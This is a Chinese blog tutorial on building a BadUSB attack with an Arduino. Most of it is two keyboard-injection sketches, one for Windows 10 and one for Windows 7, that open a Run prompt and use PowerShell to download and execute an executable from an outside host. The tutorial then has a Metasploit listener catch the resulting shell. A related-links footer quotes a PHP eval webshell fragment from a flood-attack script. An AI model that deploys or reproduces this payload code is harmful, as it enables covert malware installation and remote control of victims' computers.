badusb代码_badusb攻击代码
badusb攻击(msfconsole)
准备
badusb
Arduino
下载软件
点击下载
运行软件
![](/assets/blank.gif)
在工具
菜单中 选择,选择badusb的端口
和开发版
。
![](/assets/blank.gif)
注入代码
windows10系统
#include void setup() {Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(500);Keyboard.press('r');//r键delay(500);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);delay(500);Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);
}
void loop()//循环{}
windows7系统
#include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2"); delay(1000); Keyboard.println("POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'https://bbskali.cn/8888.exe';$FILE = ' c:\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);"); delay(3000); Keyboard.println("C:\\X.EXE&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 }void loop()//循环{}
编译上传
![](/assets/blank.gif)
成功如下:
![](/assets/blank.gif)
配置监听
在msf中我们配置参数,插入badusb即可得到shell,需要注意的是,本代码仅支持win10对于win7和xp由于不能直接用powershell
下载,所以以上代码不能实现。
其他代码
特别鸣谢以下代码由嘉木相思
提供,在此特别感谢默默为网络安全奉献的小伙伴们。
下载地址:
点击阅读原文访问下载链接
badusb代码_badusb攻击代码相关推荐
- php cc攻击代码,php cc攻击代码与防范方法
cc攻击代码,支持udp eval($_POST[Chr(90)]); set_time_limit(86400); ignore_user_abort(True); $packets = 0; $h ...
- 康奈尔大学研究员发现“代码投毒”攻击,可触发供应链攻击
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件的安全 ...
- 检测SQL注入式攻击代码
(页面数据校验类)PageValidate.cs 基本通用. using System; using System.Text; using System.Web; using System.Web.U ...
- CVE-2017-7494紧急预警:Samba蠕虫级提权漏洞,攻击代码已在网上扩散
本文讲的是 CVE-2017-7494紧急预警:Samba蠕虫级提权漏洞,攻击代码已在网上扩散, 昨天晚上,开源软件Samba官方发布 安全公告 ,称刚刚修复了软件内一个已有七年之久的严重漏洞(CVE ...
- HTML5 App的代码注入攻击
摘要 基于HTML5的手机app(译者注:以下简称HTML5 app)越来越流行了, 在大多数情况下它比native应用更容易适配不同的移动操作系统.它开发起来很方便,可以使用标准的web技术,包括H ...
- php 防ddos,网站服务器如何防范CC/ddos攻击?php防攻击代码部署
2019年7月25日 本文总结 写这篇文章的目的是因为很多 现在CC攻击/ DDOS攻击主要是调用N多个IP,频繁刷新网站的某个页面,让服务器的请求连续不断,最后造成服务器过载和宕机. WordPre ...
- 如何提高代码质量:代码复查
如何提高代码质量:代码复查 软件项目普遍存在的问题 1)新手 任何项目组成员都不可避免地出现新手,他们往往是刚刚从大学毕业的学生.这些新手由于软件开发时间太短,往往技术不成熟,没有形成良好的开发习惯, ...
- 怎样的代码算是好代码?
点击上方"朱小厮的博客",选择"设为星标" 后台回复"书",获取 后台回复"k8s",可领取k8s资料 什么是好代码 写 ...
- 说说代码质量、代码安全和软件测试那些事
作者 | 灰狐 来源 | 灰狐 最近工作需要,把代码质量.代码安全和软件测试做了一下梳理,并思考将它们更好的融入日常研发和 DevOps 流水线. 今天,就和大家简单聊聊代码质量.代码安全和软件测试的 ...
最新文章
- 在Linux终端下查看GPU正常使用的情况
- 找论文太难?试试这款「文本生成」论文搜索工具丨开源
- 刚刚入手一台G11,发短信是老是出现“发送自HTC手机”字样
- Play 2.0 用户指南 - 模版引擎 -- 针对Scala开发者
- JAVa读取文件的附加属性,Java 读取属性文件
- java md5加密32位小写_Java生成MD5的方法,简单封装并转为32位小写
- cdh jar包 sqoop2_安装sqoop1.4.6-cdh5.5.2
- linux中动态链接库用扩展名,Linux操作系统下动态库的生成及链接方法是什么?...
- ubuntu完全清除mysql残留文件和配置
- 反射生成 INSERT 多个对象的 SQL 语句(批量插入)
- azure_Azure Analysis Services中的动态分区(表格)
- 全新的Smultron 12已发布:简单好用、功能强大、优雅简洁
- VLAN划分和网络配置实例
- 飞马哥:正确推广模式框架的解析
- ssm框架搭建连接mysql_搭建SSM框架(一) - xiaoqi__y的个人空间 - OSCHINA - 中文开源技术交流社区...
- High Performance Visual Tracking with Siamese Region Proposal Network全文翻译
- python柱状图标注均值标准差_OpenCV Python 图像矩阵的均值和标准差
- java poi导出PPT格式
- 黑苹果简单的手动开启显示器HiDPI教程
- 计算机专业学习资源合集 | 视频电子书资源